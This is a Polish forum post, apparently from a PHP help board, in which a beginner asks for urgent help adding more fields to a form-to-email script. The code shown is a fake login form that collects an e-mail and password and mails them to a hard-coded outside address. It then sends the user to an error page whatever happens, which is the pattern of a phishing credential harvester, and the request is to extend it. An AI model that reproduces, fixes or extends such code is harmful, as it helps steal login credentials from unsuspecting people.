![]() |
![]() |
-embotron- |
![]()
|
Goście ![]() |
Witam, gdy mam formularz z opcjami "imie" i "nazwisko" e-mail wysyla sie idealnie, wszystko dziala, jednak gdy dodam 3 opcje, np "wiek" to juz jest problem. Potrzebuje skryptu, dzieki ktoremu wysle wiecej niz 2 dane emailem.
W php jestem zielony, jednak potrzebuje tego jak najszybciej, dlatego nie mam czasu, aby uczyc sie wszystkiego i dojsc do tego samemu. Prosze o, prawdopodobnie, banalna korekte, z gory dzieki. skrypt.php <?PHP $adresat = 'X@gmail.com'; // pod ten adres zostanie wysłana // wiadomosc @$email = $_POST['email']; @$content = $_POST['password']; $header = "From: X@poczta.fm \nContent-Type:". ' text/plain;charset="iso-8859-2"'. "\nContent-Transfer-Encoding: 8bit"; if (mail($adresat, 'List ze strony', $content, $email, $header)) header("Location: /erroreng.php"); else header("Location: /erroreng.php"); ?> czesc kodu: <form action="skrypt.php" method="post"> <font color="white">e-mail:<br> <input type="text" name="email" value=""><br> Password:<br> <input type="password" name="password" value=""><br> Nazwisko:<br></font> <input type="password" name="nazwisko" value=""> <Br><input type="submit" value="LogIn" /> |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 14.08.2025 - 03:10 |